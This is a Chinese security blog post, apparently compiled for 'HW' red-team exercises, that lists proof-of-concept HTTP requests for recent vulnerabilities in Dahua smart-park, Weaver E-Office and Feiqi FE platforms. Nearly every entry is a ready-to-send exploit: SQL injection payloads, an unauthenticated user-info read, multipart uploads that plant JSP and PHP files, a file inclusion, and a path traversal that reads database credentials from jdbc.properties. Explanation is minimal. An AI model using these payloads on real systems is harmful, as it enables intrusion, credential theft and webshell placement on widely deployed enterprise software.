HW情报-2023年8月17日-1day汇总
登录
侧边栏壁纸
博主昵称
月影

  • 累计撰写 85 篇文章
  • 累计收到 101 条评论
漏洞

HW情报-2023年8月17日-1day汇总

月影
月影
2023-08-17 / 0 评论 / 51 阅读 / 正在检测是否收录...

大华智慧园区任意密码读取攻击

GET /admin/user_getUserInfoByUserName.action?userName=system HTTP/1.1

大华智慧园区综合管理平台 searchJson SQL注入漏洞

GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(388609)),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1
Host: 127.0.0.1:7443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate

大华智慧园区综合管理平台 文件上传漏洞

POST /publishing/publishing/material/file/video HTTP/1.1
Host: xxx.xxx.xxx.xxx:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 804
Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7
Accept-Encoding: gzip, deflate
Connection: close

--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Filedata"; filename="0EaE10E7dF5F10C2.jsp"

<%@page contentType="text/html; charset=GBK"%><%@page import="java.math.BigInteger"%><%@page import="java.security.MessageDigest"%><% MessageDigest md5 = null;md5 = MessageDigest.getInstance("MD5");String s = "123456";String miyao = "";String jiamichuan = s + miyao;md5.update(jiamichuan.getBytes());String md5String = new BigInteger(1, md5.digest()).toString(16);out.println(md5String);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="poc"

poc
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Submit"

submit
--dd8f988919484abab3816881c55272a7--

大华智慧园区综合管理平台getFaceCaptureSQL注入漏洞

该poc来自链接:https://pan.baidu.com/s/1wZoSo30EXiw9vMQBPtKFWg?pwd=zyxa 
提取码:zyxa
详情自行查看

POC:
/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(123)),0x7e),1)--%22%7D/extend/%7B%7D

大华智慧园区综合管理平台video任意文件上传漏洞

该poc来自链接:https://pan.baidu.com/s/1wZoSo30EXiw9vMQBPtKFWg?pwd=zyxa 
提取码:zyxa
详情自行查看

POST /publishing/publishing/material/file/video HTTP/1.1
Host: UserAgent:Mozilla/5.0(Macintosh;IntelMacOSX10_14_3)AppleWebKit/605.1.15(KHTML,likeGecko)Version/12.0.3Safari/605.1.15
Content-Length:804
Content-Type:multipart/form-data;boundary=dd8f988919484abab3816881c55272a7
Accept-Encoding:gzip,deflate
Connection:close

--dd8f988919484abab3816881c55272a7
Content-Disposition:form-data;name="Filedata";filename="Test.jsp"

Test
--dd8f988919484abab3816881c55272a7
Content-Disposition:form-data;name="Submit"

submit
--dd8f988919484abab3816881c55272a7--


路径
/publishingImg/VIDEO/230812152005170200.jsp

泛微 HrmCareerApplyPerView S Q L 注入漏洞

GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(db_name()),db_name(1),5,6,7 HTTP/1.1
Host: 127.0.0.1:7443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)
Accept-Encoding: gzip, deflate
Connection: close

泛微 ShowDocsImagesql注入漏洞

GET /weaver/weaver.docs.docs.ShowDocsImageServlet?docId=* HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,
like Gecko) 
Accept-Encoding: gzip, deflate
Connection: close

泛微 Weaver E-Office9 前台文件包含

http://URL/E-mobile/App/Init.php?weiApi=1&sessionkey=ee651bec023d0db0c233fcb562ec7673_admin&m=12344554_../../attachment/xxx.xls

泛微E-Office uploadify.php后台文件上传漏洞

poc来自:https://mp.weixin.qq.com/s/kgEec5abI13lmgh4rtH6Qw


POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Connection: close
Content-Length: 259
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4
Accept-Encoding: gzip

--e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="2TrZmO0y0SU34qUcUGHA8EXiDgN.php"
Content-Type: image/jpeg


<?php echo "2TrZmO0y0SU34qUcUGHA8EXiDgN";unlink(__FILE__);?>


--e64bdf16c554bbc109cecef6451c26a4--


上传文件所在路径:
/attachment/3466744850/xxx.php

泛微E-Office9文件上传漏洞 CVE-2023-2523 POC

POST/Emobile/App/Ajax/ajax.php?action=mobile_upload_save  HTTP/1.1 
Host:xxx.xxx.xxx.xxx:port
Cache-Control:max-age=0  
Upgrade-Insecure-Requests:1  
Origin:null  
Content-Type:multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt  
Accept-Encoding:gzip, deflate
Accept-Language:en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection:close

------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition:form-data; name="upload_quwan"; filename="1.php."
Content-Type:image/jpeg
<?phpphpinfo();?>
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt

泛微E-Office9文件上传漏洞 CVE-2023-2648 POC

POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
Host: 192.168.233.10:8082
User-Agent: test
Connection: close
Content-Length: 493
Accept-Encoding: gzip
Content-Type: multipart/form-data

------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="Filedata"; filename="666.php"
Content-Type: application/octetstream

<?php phpinfo();?>
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt

泛微Weaver E-Office9.0文件上传

POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
Host: xxx.xxx.xxx.xxx:port
User-Agent: test
Connection: close
Content-Length: 493
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85

--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
Content-Disposition: form-data; name="Filedata"; filename="666.php"
Content-Type: application/octet-stream

<?php phpinfo();?>

--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--
--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream

--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--


POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
Host: xxx.xxx.xxx.xxx:port
User-Agent: test
Connection: close
Content-Length: 493
Accept-Encoding: gzip
Content-Type: multipart/form-data

------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="Filedata"; filename="666.php"
Content-Type: application/octet-stream

<?php phpinfo();?>

------WebKitFormBoundarydRVCGWq4Cx3Sq6tt

飞企互联 FE 业务协作平台 magePath 参数文件读取漏洞

漏洞描述:
FE 办公协作平台是实现应用开发、运行、管理、维护的信息管理平台。飞企互联 FE 业务协作平台存在文件读取漏洞,攻击者可通过该漏洞读取系统重要文件获取大量敏感信息。
漏洞影响 : 飞企互联 FE业务协作平台
网络测绘:
“flyrise.stopBackspace.js”

验证POC
/servlet/ShowImageServlet?imagePath=../web/fe.war/WEB-INF/classes/jdbc.properties&print

0
暂无标签
版权属于: 月影
本文链接: http://47.100.127.167/index.php/archives/735/
作品采用: 署名-非商业性使用-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0) 》许可协议授权

评论 (0)

取消